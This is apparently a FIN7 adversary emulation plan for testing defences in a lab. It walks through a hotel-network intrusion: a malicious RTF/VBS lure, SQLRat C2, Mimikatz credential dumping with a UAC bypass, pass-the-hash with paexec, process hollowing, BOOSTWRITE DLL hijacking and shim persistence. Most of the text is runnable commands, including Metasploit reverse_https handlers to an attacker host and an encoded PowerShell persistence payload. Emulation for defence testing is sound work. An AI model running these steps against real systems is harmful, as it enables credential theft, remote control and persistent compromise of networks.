For the purpose of this emulation plan, FIN7 operations have been separated into 2 scenarios (detections and protections), with steps and granular procedures contained within each. This division enables users to separately test detection and protection capabilities of their defenses. Within each scenario, operations have been broken into specific objectives, which are presented linearly.
While in Scenario 1 each objective enables subsequent objectives, Scenario 2 is designed such that each objective is run independently of any other. Specifically, this scenario is intended to be used in an environment that has protective/preventative defense measures enabled. That said, each organization can tailor this emulation to their individual use case, priorities, and available resources.
This emulation plan contains several placeholder values that are meant to be replaced with values specific to the target environment against which this plan is to be run. For ease of use, a script has been included to automatically make these substitutions, found here.
- Emulation of FIN7 usage of tools such as SQLRat, BABYMETAL, BOOSTWRITE, and PILLOWMINT
- Scenario begins after delivery of a reverse shell payload distributed via spearphishing
- Targeted attack of a hospitality organization with the explicit goal of credit card theft
- Split into distinct steps that can be run independently of other steps
- Designed to assess protective/preventative defense measures
- Step 1 - Initial Access with Embedded VBS in Word Document
- Step 2 - UAC Bypass and Credential Dumping
- Step 3 - Lateral Movement via Pass-the-Hash
- Step 4 - DLL Hijacking
- Step 5 - Shim Persistence
The scenario begins with an initial breach where a legitimate user (T1204) opens an RTF document and double clicks text that says "Double Click Here to Unlock Contents". The RTF file contains an embedded Visual Basic payload (T1027). After double clicking the text block, mshta.exe
executes (T1170) the Visual Basic payload(T1059).
mshta.exe
then assembles embedded text within the RTF file into a JavaScript payload. Next, mshta.exe
makes a copy of the legitimate wscript.exe
on disk as Adb156.exe
(T1036). winword.exe
spawns verclsid.exe
(T1175). mshta.exe
loads taskschd.dll
and creates a scheduled task to execute in 5 minutes (T1053). The previously created scheduled task spawns Adb156.exe
via svchost (T1053.005).
Adb156.exe
then loads scrobj.dll
and executes sql-rat.js
via jscript(T1059.7).
Next, Adb156.exe
connects to 192.168.0.6 via MSSQL transactions (T1071) (TCP port 1433). Finally, FIN7 performs WMI queries to obtain network configuration information (T1016) and system information (T1082).
This step consists of behaviors found in Step 1 of Scenario 1.
On the Windows Attack Platform
:
-
Open a CMD prompt
-
cd
to thec2fin7.exe
binary -
Execute the following command
[ATT&CK RAT]> .\c2fin7.exe -server 192.168.0.6
1.B - User Execution: Malicious File (using Microsoft Word) (T1204.002)
If testing with Microsoft Word, perform the following. If not, perform Step 1.B* instead.
On the Linux Attack Platform
:
-
Copy
2-list.rtf
to<domain_admin>
's Desktop onhotelmanager
.sudo smbclient -U '<domain_full>\<domain_admin>' //<hotelmanager_ip>/C$ -c "put fin7/Resources/Step1/2-list.rtf Users\\<domain_admin>.<domain>\\Desktop\\2-list.rtf"
Provide
<domain_admin>
's password when prompted:<domain_admin_password>
On hotelmanager
:
-
Login to victim workstation as
<domain_admin>
xfreerdp +clipboard /u:"<domain_admin>@<domain_full>" /p:"<domain_admin_password>" /v:<hotelmanager_ip>
-
Double-click
2-list.rtf
located on<domain_admin>
's desktop -
Decline any spurious prompts, including updating document with linked data
-
Double click the text that says "Double Click Here To Unlock Contents"
-
When prompted to run an
lnk
file, click "open" -
Set a timer for 6 minutes - the scheduled task will fire 5 minutes after opening the lnk file on the minute so take 6 to be safe
Perform the following if you're testing without Office licenses:
On the Linux Attack Platform
:
-
Upload
2-list.rtf
,unprotectedNoWord.lnk
, andobfuscated-payload.vbs
tohotelmanager
as2-list.rtf
,2-list.lnk
, andpayload.vbs
respectivelysudo smbclient -U '<domain_full>\<domain_admin>' //<hotelmanager_ip>/C$ -c "put fin7/Resources/Step1/SQLRat/2-list.rtf Users\\<domain_admin>.<domain>\\Desktop\\2-list.rtf; put /home/<attacker>/fin7/Resources/Step1/unprotectedNoWord.lnk Users\\<domain_admin>.<domain>\\Desktop\\2-list.lnk; put /home/<attacker>/fin7/Resources/Step1/obfuscated-payload.vbs Users\\<domain_admin>.<domain>\\AppData\\Local\\payload.vbs"
Provide
<domain_admin>
's password when prompted:<domain_admin_password>
On hotelmanager
:
-
Login to victim workstation as
<domain_admin>
xfreerdp +clipboard /u:"<domain_admin>@<domain_full>" /p:"<domain_admin_password>" /v:<hotelmanager_ip>
-
Double-click
2-list.rtf
located on<domain_admin>
's desktop -
Decline any spurious prompts, including updating document with linked data
-
Double click
2-list.lnk
on<domain_admin>
's Desktop -
Set a timer for 6 minutes - the scheduled task will fire 5 minutes after opening the lnk file on the minute so take 6 to be safe
1.C - SQLRat Execution via Scheduled Task (T1053.005)
On the Windows Attack Platform
:
-
- To verify that you have a new session on
hotelmanager
from your C2 server, run the following command to get the MAC ofhotelmanager
(ATT&CK Evals) > get-mac-serial
- To verify that you have a new session on
-
Delete scheduled the previously created scheduled task via SQLRat to prevent re-firing
(ATT&CK Evals) > exec-cmd "schtasks.exe /Delete /TN \"Micriosoft Update Service\" /F"
-
Kill the existing session
(ATT&CK Evals) > exec-cmd "taskkill /F /IM adb156.exe"
The C2 server should repeatedly say "Waiting for response..." This indicates that the session was successfully terminated.
-
Close the C2 server
(ATT&CK Evals) > exit
Close the RDP session to hotelmanager
.
-
FIN7 has created malicious DOCX and RTF lures that convince users to double-click on an image in the document. When a user double-clicks an image, an embedded malicious LNK file is spawned that launches mshta.exe, which executes a VBScript one-liner to decode a script hidden in the document. 4
-
FIN7 has copied wscript.exe into %LOCALAPPDATA% and renamed it. 3, 25
-
FIN7 has created scheduled tasks to establish persistence. 23, 4
In this step, FIN7 uploads 2 files to hotelmanager
(T1105). These are samcat.exe
, a modified version of Mimikatz, and uac-samcats.ps1
, a PowerShell T1059.001 wrapper script that performs a UAC bypass T1548.002 before executing samcat.exe
. After uploading these files, FIN7 logs into hotelmanager
T1078.002 and executes uac-samcats.ps1
to dump credentials T1003.001 from an elevated user context.
This step consists of behaviors found in Step 5 of Scenario 1.
On the Linux Attack Platform
:
-
Upload
samcat.exe
(modified Mimikatz) anduac-samcats.ps1
(UAC Bypass script) tohotelmanager
sudo smbclient -U '<domain>\<domain_admin>' //<hotelmanager_ip>/C$ -c "put /home/<attacker>/fin7/Resources/Step5/samcat.exe Users\\<domain_admin>.<domain>\\AppData\\Local\\samcat.exe; put /home/<attacker>/fin7/Resources/Step5/uac-samcats.ps1 Users\\<domain_admin>.<domain>\\AppData\\Local\\uac-samcats.ps1"
Provide
<domain_admin>
's password when prompted:<domain_admin_password>
On hotelmanager
:
-
RDP in as
<domain_admin>
xfreerdp +clipboard /u:<domain>\\<domain_admin> /p:"<domain_admin_password>" /v:<hotelmanager_ip>
-
Open a PowerShell window
-
Execute the
uac-samcats.ps1
PowerShell scriptpowershell > C:\Users\<domain_admin>.<domain>\AppData\Local\uac-samcats.ps1
Wait for the script to return. You should see credentials dumped to the screen.
-
After
uac-samcats.ps1
completes, close the RDP session onHotel Manager
-
FIN7 has used memory scrapers such as mimikatz to dump the passwords of logged on users. 9, 6
-
The Carbanak malware has contained a UAC bypass. 10
Step 3 begins with FIN7 downloading paexec.exe
and hollow.exe
via powershell.exe (T1105) to <domain_admin>
's AppData\Local\
directory on hotelmanager
. Next, FIN7 uses a previously obtained password hash to perform a pass-the-hash attack (T1550.002) with paexec.exe
(T1021.002) in order to copy hollow.exe
onto itadmin
from hotelmanager
as <domain_admin>
. paexec.exe
starts a temporary Windows service (T1035) during the copying process called PAExec-{PID}-{HOSTNAME}.exe
which executes hollow.exe
(T1021.002). hollow.exe
spawns svchost.exe
and unmaps its memory image (T1055.012) to insert its payload. svchost.exe
then exchanges data with 192.168.0.4 over HTTPS (T1071.001, T1573.002).
This step consists of behaviors found in Step 6 of Scenario 1.
On the Linux Attack Platform
:
-
Start
tmux
if it is not already startedtmux
-
Start Metasploit
sudo msfconsole
-
Setup a Meterpreter handler for
hollow.exe
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set lport 443 set lhost 192.168.0.4 set ExitOnSession False exploit -j
-
Open a new
tmux
windowCtrl+b c
-
Upload
paexec.exe
andhollow.exe
tohotelmanager
sudo smbclient -U '<domain>\<domain_admin>' //<hotelmanager_ip>/C$ -c "put /home/<attacker>/fin7/Resources/Step6/paexec.exe Users\\<domain_admin>.<domain>\\AppData\\Local\\paexec.exe;put /home/<attacker>/fin7/Resources/Step6/hollow.exe Users\\<domain_admin>.<domain>\\AppData\\Local\\hollow.exe"
Provide
<domain_admin>
's password when prompted:<domain_admin_password>
-
Exit this
tmux
window to get back to the Metasploit windowexit
On hotelmanager
:
-
RDP into
hotelmanager
as<domain_admin>
xfreerdp +clipboard /u:<domain>\\<domain_admin> /p:"<domain_admin_password>" /v:<hotelmanager_ip>
-
Open a
CMD
prompt -
cd
to theAppData\Local
directorycmd > cd C:\\Users\\<domain_admin>.<domain>\\AppData\\Local
-
Use
paexec.exe
to perform pass-the-hash to executehollow.exe
onitadmin
cmd > .\paexec.exe \\<itadmin_ip> -s -u <domain>\<domain_admin> -p <domain_admin_password_hash> -c -csrc ".\hollow.exe" hollow.exe
You should receive a new Meterpreter session.
Back on the Linux Attack Platform
:
-
Interact with the the newly created Meterpreter session
msf > sessions -i 1
-
Execute
getpid
to verify that the Meterpreter session is functionalmeterpreter > getpid
-
Exit Meterpreter session
meterpreter > exit
-
Exit Metasploit
msf > exit
-
Exit
tmux
exit
Close the RDP session to hotelmanager
.
-
FIN7 has used PAExec to execute remote commands and move laterally within an environment. 9, 6
-
FIN7 has performed process injection to execute malicious payloads from memory. 19, 13
Step 4 focuses on emulating the DLL Hijacking and module execution functionality of BOOSTWRITE. This step starts by creating a BOOSTWRITE Meterpreter handler and staging a temporary Python HTTP server that returns the ASCII character "B" as an XOR decryption key. BOOSTWRITE.dll is then uploaded to itadmin
as C:\Windows\SysWOW64\srrstr.dll
(T1105). The srrstr.dll
DLL is masquerading (T1036.005 as the legitimate srrstrl.dll
found in C:\Windows\System32
. Next, cmd.exe
spawns from svchost.exe
(T1059.003) to execute SystemPropertiesAdvanced.exe
, which in turn loads and executes the malicious srrstr.dll
(T1574). After srrstr.dll
has been loaded and executed, rundll32.exe
is spawned as a child process to communicate with the C2 server over HTTPS on port 8080 (T1071, T1573) granting a new shell to the adversary.
This step consists of behaviors found in Step 7 of Scenario 1.
On the Linux Attack Platform
:
-
Start
tmux
if it is not already startedtmux
-
Start Metasploit
sudo msfconsole
-
Setup a Meterpreter handler on 8080 for the BOOSTWRITE shell
use exploit/multi/handler set payload windows/meterpreter/reverse_https set LPORT 8080 set LHOST 192.168.0.4 set ExitOnSession false exploit -j
-
Open a new
tmux
windowCtrl+b c
-
Setup a
Python
HTTP server to host the XOR key needed by BOOSTWRITEecho "B" > /tmp/index.html; cd /tmp/; sudo python3 -m http.server 80
On your Ubuntu
machine:
- RDP into
itadmin
xfreerdp +clipboard /u:<domain>\\<domain_admin> /p:"<domain_admin_password>" /v:<itadmin_ip>
On the Linux Attack Platform
:
-
Open a new
tmux
windowCtrl+b c
-
Upload
BOOSTWRITE.dll
toC:\Windows\Syswow64\
onitadmin
sudo smbclient -U '<domain>\<domain_admin>' //<itadmin_ip>/C$ -c "put /home/<attacker>/fin7/Resources/Step7/BOOSTWRITE.dll Windows\\SysWOW64\\srrstr.dll"
Provide
<domain_admin>
's password when prompted:<domain_admin_password>
-
Exit current
tmux
windowexit
On itadmin
:
-
Open an administrator CMD prompt
-
Execute
SystemPropertiesAdvanced.exe
to perform the DLL Hijackcmd > C:\\Windows\\Syswow64\\SystemPropertiesAdvanced.exe"
You should receive a new Meterpreter session on the
Linux Attack Platform
.
Back on the Linux Attack Platform
:
-
Stop
Python
HTTP serverCtrl+c
-
Exit
Python
HTTP servertmux
windowexit
-
Interact with the newly created Meterpreter session
msf > sessions -i 1
-
Execute
getpid
to verify that the Meterpreter session is functionalmeterpreter > getpid
Sometimes it takes 1-2 minutes for the reflective DLL to register to the C2 server.
If you execute
getpid
and receive no output, wait 30 seconds and try again. -
Exit Meterpreter session
meterpreter > exit
-
Exit Metasploit
msf > exit
-
Exit
tmux
sessionexit
Close the RDP session to itadmin
.
- BOOSTWRITE is a loader that has been launched via abuse of the DLL search order of applications which load legitimate services. This has included matching names of legitimate DLLs to force applications to import BOOSTWRITE DLLs instead of the legitimate DLLs.2
Step 5 focuses on emulating persistence techniques. Adversary emulation begins with a valid logon to the accounting workstation as <domain_admin>
(T078). After establishing an RDP session from itadmin
to accounting
over TCP port 3389 (T1021, T1090), FIN7 runs an encoded PowerShell command (T1059). This PowerShell command downloads dll329.dll
and sdbE376.tmp
from the Linux Attack Platform
(T1105), and then executes sdbinst.exe
to install an application shim (T1546.011) with the downloaded files.
This step consists of behaviors found in Steps 9 and 10 of Scenario 1.
5.A - Setup Shim Persistence (T1546.001)
On the Linux Attack Platform
:
-
Start Metasploit
sudo msfconsole
-
Start a Meterpreter handler on port 53
msf > handler -p windows/meterpreter/reverse_https -H 192.168.0.4 -P 53
On accounting
:
-
RDP into accounting
xfreerdp +clipboard /u:<domain>\\<domain_admin> /p:"<domain_admin_password>" /v:<accounting_ip> /drive:X,<ubuntu_fin7_dir_abs_path>/Resources/Step9
-
Open an administrative PowerShell session
-
Execute the following Powershell command, which will install the application shim for persistence
powershell > powershell -noprofile -encodedCommand "JABkAGwAbAAgAD0AIABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAiAFwAXAB0AHMAYwBsAGkAZQBuAHQAXABYAFwAYgBpAG4AMwAyADkALgB0AG0AcAAiACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlADsAIABOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAEQAUgBNAFwAIgAgAC0ATgBhAG0AZQAgACIANAAiACAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAQgBpAG4AYQByAHkAIAAtAFYAYQBsAHUAZQAgACQAZABsAGwAIAAtAEYAbwByAGMAZQA7ACAAIABDAG8AcAB5AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAXABcAHQAcwBjAGwAaQBlAG4AdABcAFgAXABkAGwAbAAzADIAOQAuAGQAbABsACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgAgAC0ARgBvAHIAYwBlADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAXABcAHQAcwBjAGwAaQBlAG4AdABcAFgAXABzAGQAYgBFADMANwA2AC4AdABtAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcAAiACAALQBGAG8AcgBjAGUAOwAgACAAJgAgAHMAZABiAGkAbgBzAHQALgBlAHgAZQAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABzAGQAYgBFADMANwA2AC4AdABtAHAAIgA7AA=="
5.B - Execute Shim Persistence (T1546.001)
-
Reboot
accounting
powershell > Restart-Computer -Force
-
Wait for
accounting
to start back up and then RDP in once againxfreerdp +clipboard /u:<domain>\\<domain_admin> /p:"<domain_admin_password>" /v:<accounting_ip>
You should receive a new Meterpreter callback on the
Linux Attack Platform
.
On the Linux Attack Platform
:
-
Interact with the new Meterpreter session
msf > sessions -i 1
-
Execute
getpid
to verify that the Meterpreter session is functionalmeterpreter > getpid
-
Exit Meterpreter session
meterpreter > exit
-
Exit Metasploit
msf > exit
Close the RDP session to accounting
.
-
The Carbanak malware is capable of performing network tunneling. 21
-
FIN7 has utilized terminal services such as Remote Desktop Protocol (RDP) to move laterally within environments. 9
-
FIN7 has leveraged an application shim database registered using the sdbinst.exe utility to achieve persistence on systems in multiple environments. To install and register the malicious shim database, FIN7 has used custom Base64 encoded PowerShell scripts. 24
-
FIN7 has utilized application shimming to execute a payload stored within the registry. 24